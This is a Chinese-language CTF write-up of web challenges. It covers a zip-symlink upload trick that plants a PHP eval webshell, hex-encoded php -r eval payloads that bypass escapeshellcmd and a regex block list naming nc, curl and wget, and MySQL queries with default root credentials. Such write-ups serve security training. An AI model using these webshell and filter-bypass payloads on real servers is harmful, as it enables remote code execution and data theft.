Unzip

软连接

软连接是linux中一个常用命令，它的功能是为某一个文件在另外一个位置建立一个同步的链接。换句话说，也可以理解成Windows中的快捷方式

注意：在创建软连接的文件的所有目录下不能有重名的文件

打开环境，是文件上传，扫描一下后台看看有没有源码

扫描发现存在upload.php，查看一下(去大佬哪里copy一下源码的解释)

 <?php error_reporting(0); highlight_file(__FILE__); $finfo = finfo_open(FILEINFO_MIME_TYPE); if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip'){  //这里是验证MIME值，确定上传的文件类型为zip，同时也为我们指明了方向，要上传一个zip压缩包。exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]); //这里的意思是进入/tmp目录下，然后调用unzip命令对压缩包进行解压，也就是把压缩包解压到/tmp目录下。 unzip -o是用来覆盖已经存在的变量的；$_FILES[“file”][“tmp_name”]是一个超全局变量，用来存储上传文件在服务器上的临时文件名
};//only this! 

既然是文件上传而且已知上传的类型，应该上传带码的zip文件来getshell，但是题目将zip放到tmp下解压，这样即使我们上传了码也是不能getshell，因为访问不了tmp目录 ；但是我们可以访问网站的根目录(默认为/var/www/html)，所以就涉及到软连接，通过软连接使得在tmp目录中指向/var/www/html

软连接在linux中创建

创建软连接命令

ln -s [dir1] [dir2]  #dir1是真实的文件夹，dir2是dir1的软链接。

翻译一下就是dir2是dir1的快捷方式

先创建一个文件夹，进入文件夹后创建软连接

ln -s /var/www/html link #创建名为link的软连接zip --symlinks link.zip link #压缩软连接

 

 现在存在一个link文件夹，删除link文件夹，因为我们还需要创建一个带码的zip文件，并且要和软连接相同名字命名为link1.zip

进入到新创建的link文件夹中，创建一个写入码的shell.php

echo '<?php @eval($_GET["cmd"]);?>'>shell.php 

 

这里的一句话木马中的参数要注意一下，不然可能上传后会报错，说参数没有定义（怎么避免自己看吧）

退回上级目录，将link压缩为zip文件

zip -r link1.zip ./*   

 

分别上传link.zip和link1.zip，访问shell.php页面进行命令执行

simple_php

这是今年的国赛题，涉及到利用进制转换来进行RCE，在19年的国赛中也是出现过类似的题目，只是这次一时间没有想到这个点

先认识两个函数：hex2bin，bin2hex

hex2bin：把16进制转换为ACill码

bin2hex:把ACill码转换为16进制

<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);if(isset($_POST['cmd'])){$cmd = escapeshellcmd($_POST['cmd']); if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {system($cmd);
}
}show_source(__FILE__);
?>

 先分析源码，存在三个需要绕过的地方，open_basedir,escapeshellcmd,preg_match,

先单独进行分析，首先来分析open_basedir

open_basedir是php.ini中的配置文件，可以限制用户访问文件的范围，例如本题，就限制了用户在php脚本中只能访问/var/www/html下的文件

绕过方法

1.open_basedir对于命令执行没有限制，可以通过命令执行绕过(sytem('ls ')等)

2.使用软连接绕过，使用软连接可以指向我们可以访问的目录或者文件下

3.glob协议绕过

更详细的可以去多多了解

分析escapeshellcmd

escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义;

反斜线（\）会在以下字符之前插入： &#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替

当出现这个函数时，如果我们想要用命令执行来绕过open_basedir，就会被过滤，所以怎样绕过是我们要思考的

最后的正则匹配过滤了大部分的命令执行，还有一些符号，三个函数可以说过滤了很多绕过方式，编码绕过的话，有特殊字符会被转义，命令执行被正则过滤或者转义

在三个函数中，最主要的是绕过转义，绕过转义之后，其他两个我们都能简单绕过

那么既能够不被转义，又能不被匹配，还是命令执行的，我们可以用进制转换来试一试

在十六进制中，只存在数字和字母，不会被转义，还能进制转换后绕过正则

开始构造payload

源码中有system，应该先考虑命令执行

cmd=system('ls');

进行进制转换

system('ls')=>73797374656d28276c7327293b
hex2bin("73797374656d28276c7327293b")

 转为16进制的字符串在用hex2bin函数转为acill码时，需要引号包裹，但是引号被过滤了，可以使用"_"来让16进制被识别为字符串，再用substr，把下划线去掉进行进制转换

hex2bin(substr(_73797374656d28276c7327293b,1))

php -r执行php代码，执行后得到system('ls');,再system(),进行命令执行

cmd=php -r eval(hex2bin(substr(_73797374656d28276c7327293b,1)));

 

 查看flag，发现目录下没有flag文件，到数据库中查询

登录数据库，用户密码默认root，- e执行相关的sql操作

echo `mysql -u root -p'root' -e 'use PHP_CMS;show databases;'`;(php_cms是数据库内容管理系统)

cmd=php -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77206461746162617365733b27603b,1)));

 查表

echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;'`;

cmd=php -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b27603b,1)));

 

查表中内容

echo `mysql -u root -p'root' -e 'use PHP_CMS;select * from F1ag_Se3Re7;'`;

cmd=php -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1)));

 

[CISCN 2019 初赛]Love Math

这题也是利用进制转换，不过禁用了hex2bin，用base_convert来进制转换绕过就行

base_convert() 函数在任意进制之间转换数字

语法

base_convert(原本数字,之前的进制,需要转化的进制）